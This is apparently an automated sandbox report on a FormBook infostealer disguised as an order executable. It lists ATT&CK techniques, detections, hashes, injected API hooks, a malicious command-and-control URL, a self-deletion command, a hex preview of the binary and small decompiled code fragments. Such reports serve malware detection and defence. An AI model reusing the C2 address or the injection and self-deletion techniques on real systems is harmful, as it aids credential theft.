          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | Input Capture 1 | Process Discovery 2 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 412 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Timestomp 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          CNEW ORDER17.exe | 100% | Avira | HEUR/AGEN.1142543
          CNEW ORDER17.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe | 100% | Avira | HEUR/AGEN.1142543
          C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe | 100% | Joe Sandbox ML |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          0.0.CNEW ORDER17.exe.1a0000.0.unpack | 100% | Avira | HEUR/AGEN.1142543
          15.2.CNEW ORDER17.exe.4d0000.1.unpack | 100% | Avira | HEUR/AGEN.1142543
          15.0.CNEW ORDER17.exe.4d0000.0.unpack | 100% | Avira | HEUR/AGEN.1142543
          15.2.CNEW ORDER17.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.CNEW ORDER17.exe.1a0000.0.unpack | 100% | Avira | HEUR/AGEN.1142543

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          www.cursoukulelegospel.com/h0c4/ | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          www.cursoukulelegospel.com/h0c4/ | true | Avira URL Cloud: safe | low

          Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:502245
          Start date:13.10.2021
          Start time:18:34:34
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 9m 44s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:CNEW ORDER17.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:23
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@8/3@0/0
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 44% (good quality ratio 39.1%)
          • Quality average: 68.5%
          • Quality standard deviation: 33.4%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 56
          • Number of non-executed functions: 95
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Excluded IPs from analysis (whitelisted): 20.49.157.6, 209.197.3.8, 93.184.221.240, 20.199.120.182, 20.54.110.249, 40.112.88.60, 52.251.79.25, 20.199.120.151, 2.20.178.33, 2.20.178.24, 20.199.120.85
          • Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
          • Not all processes where analyzed, report is missing behavior information
          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/502245/sample/CNEW ORDER17.exe

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CNEW ORDER17.exe.log
          Process:C:\Users\user\Desktop\CNEW ORDER17.exe
          File Type:ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):425
          Entropy (8bit):5.340009400190196
          Encrypted:false
          SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
          MD5:CC144808DBAF00E03294347EADC8E779
          SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
          SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
          SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
          Malicious:true
          Reputation:moderate, very likely benign file
          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
          C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe
          Process:C:\Users\user\Desktop\CNEW ORDER17.exe
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):983040
          Entropy (8bit):7.643700581671609
          Encrypted:false
          SSDEEP:12288:lxGAAVPJ9rY0Vjf23ZgTJt8mwSwtpaYKXrEUpDK30dBlVhxYuWyrZFvn6+OhO:eAGNYoOiT/8mN+aYW4OHboirZFv6/
          MD5:C54EDC9EF9D72FE0FE048E8AC884626B
          SHA1:11DCE70F33E490EB9B89726776915A374BB59A59
          SHA-256:43FCB442B80665D42271689310EBD569E84F74287063A62E14BEBA808178E098
          SHA-512:C65D37DE77AD4598EE0B665145C988681D38FC26AA2EB2F5B5D1B73646EAA843CB18C4172D0ED7DCEE4BD25BDF692E7B1AACC410A56B6959158F9E3BAB1F0C81
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: Joe Sandbox ML, Detection: 100%
          Reputation:low
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y,...............0..l..........j.... ........@.. .......................`............@.....................................O............................@....................................................... ............... ..H............text...pj... ...l.................. ..`.rsrc................n..............@..@.reloc.......@......................@..B................L.......H.......(#...............3...V..........................................~r...p(......-.(....*r...p(....*.0..H.......s......o....+..o.......(....(......(.....o.......(....#......3@2..o....*.0..M.......(....(....o.......+2.....o....,"..( ...,..o!...r...p("...,..(....&..X....i2.*....0..4.......ri..p(#...r...p ............%.(....(.....o$...t....*.0.."........r...p .......o$....$......&...*.*...................(....*..0.......... .....%..... .....%.......i.&.....(%...r...po&......
          C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe:Zone.Identifier
          Process:C:\Users\user\Desktop\CNEW ORDER17.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):26
          Entropy (8bit):3.95006375643621
          Encrypted:false
          SSDEEP:3:ggPYV:rPYV
          MD5:187F488E27DB4AF347237FE461A079AD
          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
          Malicious:true
          Reputation:high, very likely benign file
          Preview: [ZoneTransfer]....ZoneId=0

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Entropy (8bit):7.643700581671609
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          • Win32 Executable (generic) a (10002005/4) 49.78%
          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          File name:CNEW ORDER17.exe
          File size:983040
          MD5:c54edc9ef9d72fe0fe048e8ac884626b
          SHA1:11dce70f33e490eb9b89726776915a374bb59a59
          SHA256:43fcb442b80665d42271689310ebd569e84f74287063a62e14beba808178e098
          SHA512:c65d37de77ad4598ee0b665145c988681d38fc26aa2eb2f5b5d1b73646eaa843cb18c4172d0ed7dcee4bd25bdf692e7b1aacc410a56b6959158f9e3bab1f0c81
          SSDEEP:12288:lxGAAVPJ9rY0Vjf23ZgTJt8mwSwtpaYKXrEUpDK30dBlVhxYuWyrZFvn6+OhO:eAGNYoOiT/8mN+aYW4OHboirZFv6/

          File Icon

          Icon Hash:07d8d8d4d4d85026

          Static PE Info

          General

          Entrypoint:0x4c8a6a
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Time Stamp:0xE32C5996 [Tue Oct 10 16:02:30 2090 UTC]
          TLS Callbacks:
          CLR (.Net) Version:v4.0.30319
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

          Entrypoint Preview

          Instruction
          jmp dword ptr [00402000h]
          add byte ptr [eax], al

          Data Directories

          Name | Virtual Address | Virtual Size | Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8a18 | 0x4f | .text
          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xca000 | 0x28f18 | .rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf4000 | 0xc | .reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc89fc | 0x1c | .text
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

          Sections

          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
          .text | 0x2000 | 0xc6a70 | 0xc6c00 | False | 0.997636595912 | data | 7.99906118019 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rsrc | 0xca000 | 0x28f18 | 0x29000 | False | 0.0645364900915 | data | 3.05282770232 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc | 0xf4000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0980041756627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          Name | RVA | Size | Type | Language | Country
          RT_ICON | 0xca3c0 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1650615026, next used block 1650614882 | |
          RT_ICON | 0xca6b8 | 0x128 | GLS_BINARY_LSB_FIRST | |
          RT_ICON | 0xca7f0 | 0x2ca8 | dBase IV DBT of \300.DBF, block length 9216, next free block index 40, next free block 16843009, next used block 16843009 | |
          RT_ICON | 0xcd4a8 | 0x1bc8 | data | |
          RT_ICON | 0xcf080 | 0x1628 | dBase IV DBT of \200.DBF, blocks size 0, block length 4096, next free block index 40, next free block 4294967295, next used block 4294967295 | |
          RT_ICON | 0xd06b8 | 0x1418 | data | |
          RT_ICON | 0xd1ae0 | 0xea8 | data | |
          RT_ICON | 0xd2998 | 0xba8 | data | |
          RT_ICON | 0xd3550 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | |
          RT_ICON | 0xd3e08 | 0x6c8 | data | |
          RT_ICON | 0xd44e0 | 0x608 | data | |
          RT_ICON | 0xd4af8 | 0x568 | GLS_BINARY_LSB_FIRST | |
          RT_ICON | 0xd5070 | 0xc33 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
          RT_ICON | 0xd5cb4 | 0x94a8 | data | |
          RT_ICON | 0xdf16c | 0x5488 | data | |
          RT_ICON | 0xe4604 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0 | |
          RT_ICON | 0xe883c | 0x3a48 | data | |
          RT_ICON | 0xec294 | 0x25a8 | data | |
          RT_ICON | 0xee84c | 0x1a68 | data | |
          RT_ICON | 0xf02c4 | 0x10a8 | data | |
          RT_ICON | 0xf137c | 0x988 | data | |
          RT_ICON | 0xf1d14 | 0x6b8 | data | |
          RT_ICON | 0xf23dc | 0x468 | GLS_BINARY_LSB_FIRST | |
          RT_GROUP_ICON | 0xf2854 | 0x148 | data | |
          RT_VERSION | 0xf29ac | 0x36c | data | |
          RT_MANIFEST | 0xf2d28 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

          Imports

          DLL | Import
          mscoree.dll | _CorExeMain

          Version Infos

          Description | Data
          Translation | 0x0000 0x04b0
          LegalCopyright | Copyright 2021
          Assembly Version | 1.0.0.0
          InternalName | ConsoleApp17.exe
          FileVersion | 1.0.0.0
          CompanyName |
          LegalTrademarks |
          Comments | WindowsFormsApp7
          ProductName | WindowsFormsApp7
          ProductVersion | 1.0.0.0
          FileDescription | WindowsFormsApp7
          OriginalFilename | ConsoleApp17.exe

          Network Behavior

          No network behavior found

          Code Manipulations

          User Modules

          Hook Summary

          Function Name | Hook Type | Active in Processes
          PeekMessageA | INLINE | explorer.exe
          PeekMessageW | INLINE | explorer.exe
          GetMessageW | INLINE | explorer.exe
          GetMessageA | INLINE | explorer.exe

          Processes

          Process: explorer.exe, Module: user32.dll
          Function Name | Hook Type | New Data
          PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xEA
          PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xEA
          GetMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xEA
          GetMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xEA

          System Behavior

          General

          Start time:18:35:34
          Start date:13/10/2021
          Path:C:\Users\user\Desktop\CNEW ORDER17.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\CNEW ORDER17.exe'
          Imagebase:0x1a0000
          File size:983040 bytes
          MD5 hash:C54EDC9EF9D72FE0FE048E8AC884626B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:low

          General

          Start time:18:36:33
          Start date:13/10/2021
          Path:C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe
          Imagebase:0x4d0000
          File size:983040 bytes
          MD5 hash:C54EDC9EF9D72FE0FE048E8AC884626B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 100%, Joe Sandbox ML
          Reputation:low

          General

          Start time:18:36:35
          Start date:13/10/2021
          Path:C:\Windows\explorer.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\Explorer.EXE
          Imagebase:0x7ff720ea0000
          File size:3933184 bytes
          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:high

          General

          Start time:18:37:16
          Start date:13/10/2021
          Path:C:\Windows\SysWOW64\raserver.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\raserver.exe
          Imagebase:0xc0000
          File size:108544 bytes
          MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:moderate

          General

          Start time:18:37:20
          Start date:13/10/2021
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:/c del 'C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe'
          Imagebase:0xd80000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:18:37:20
          Start date:13/10/2021
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7f20f0000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Disassembly

          Code Analysis

            Executed Functions

            Memory Dump Source
            • Source File: 00000000.00000002.423868362.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f5226496fb8039a40c04a66409e364734cff0d7518203abe912e00fdd98d3d65
            • Instruction ID: 4083c432379ef441f195b809c31b7a6ac52114b5611c29119f5990a6212ed2bd
            • Opcode Fuzzy Hash: f5226496fb8039a40c04a66409e364734cff0d7518203abe912e00fdd98d3d65
            • Instruction Fuzzy Hash: 7121F6715842449FDB20EF14D5C4B66BB69FBC4314F20C669D8455B281C33ADC07C761
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.423868362.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1d356e738c77c740cf6e7af0c5f3bf2e23ccfe7435aa47788a5be62dc3261056
            • Instruction ID: 8e7787e7d387a077606b470be9ed8411b4a42413df379eafc10d459f26592b78
            • Opcode Fuzzy Hash: 1d356e738c77c740cf6e7af0c5f3bf2e23ccfe7435aa47788a5be62dc3261056
            • Instruction Fuzzy Hash: 8D110671544284CFDB21DF14D5C4B16FB71FB84324F24C6AAC8494B686C33AD80BCB92
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Executed Functions

            APIs
            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025
            Strings
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID: BMA$BMA
            • API String ID: 2738559852-2163208940
            • Opcode ID: 0198830ce0ec1a67cca983e6ebc44af9f2406b80b95dcfc6c2cdc26251ef57a6
            • Instruction ID: b282d4db4860f9f1fa6b8ea4a55207acd3d7ccaaa3858a6f1ef1e11ccf14a342
            • Opcode Fuzzy Hash: 0198830ce0ec1a67cca983e6ebc44af9f2406b80b95dcfc6c2cdc26251ef57a6
            • Instruction Fuzzy Hash: 05F0F4B2210208ABCB14DF99DC81EEB7BADAF8C354F158248BA0D97241C670E811CBE0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E00419FE0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
            				void* _t18;
            				void* _t27;
            				intOrPtr* _t28;
            
            				_t13 = _a4;
            				_t28 = _a4 + 0xc48;
            				E0041AB30(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
            				_t6 =  &_a32; // 0x414d42
            				_t12 =  &_a8; // 0x414d42
            				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
            				return _t18;
            			}







            APIs
            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025
            Strings
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID: BMA$BMA
            • API String ID: 2738559852-2163208940
            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
            • Instruction ID: 370e936de0c6b30a0e9c68c176e8d16dab5dfb862c4be705976860dd555c5517
            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
